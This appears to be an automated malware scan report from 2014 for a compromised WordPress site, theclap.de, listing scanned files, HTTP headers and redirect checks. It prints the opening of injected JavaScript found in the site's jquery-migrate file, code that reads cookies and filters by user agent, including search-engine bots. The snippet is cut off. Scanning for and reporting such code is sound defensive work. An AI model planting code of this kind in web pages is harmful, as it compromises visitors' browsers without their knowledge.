Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=theclap.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://theclap.de/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 05 Oct 2014 01:17:58 GMT Location: http://www.theclap.de/ Server: nginx/1.2.1 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.theclap.de/xmlrpc.php X-Powered-By: PHP/5.4.30 | clean |
http://www.theclap.de/ | 200 OK Content-Length: 23967 Content-Type: text/html | clean |
http://www.theclap.de/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 96868 Content-Type: application/x-javascript | clean |
http://www.theclap.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8261 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.theclap.de/wp-content/plugins/flash-album-gallery/admin/js/swfobject.js?ver=2.2 | 200 OK Content-Length: 11754 Content-Type: application/x-javascript | clean |
http://www.theclap.de/wp-content/plugins/flash-album-gallery/admin/js/swfaddress.js?ver=2.4 | 200 OK Content-Length: 15916 Content-Type: application/x-javascript | clean |
http://www.theclap.de/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20 | 200 OK Content-Length: 16309 Content-Type: application/x-javascript | clean |
http://www.theclap.de/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.9.3 | 200 OK Content-Length: 10719 Content-Type: application/x-javascript | clean |
http://www.theclap.de/wp-content/themes/twentyfourteen/js/functions.js?ver=20140616 | 200 OK Content-Length: 4510 Content-Type: application/x-javascript | clean |
http://theclap.de/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: theclap.de
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 05 Oct 2014 01:17:58 GMT
Location: http://www.theclap.de/
Server: nginx/1.2.1
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.theclap.de/xmlrpc.php
X-Powered-By: PHP/5.4.30
...0 bytes of data.
GET / HTTP/1.1
Host: theclap.de
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 05 Oct 2014 01:17:58 GMT
Location: http://www.theclap.de/
Server: nginx/1.2.1
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.theclap.de/xmlrpc.php
X-Powered-By: PHP/5.4.30
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: theclap.de
Referer: http://www.google.com/search?q=theclap.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: theclap.de
Referer: http://www.google.com/search?q=theclap.de
Result:
The result is similar to the first query. There are no suspicious redirects found.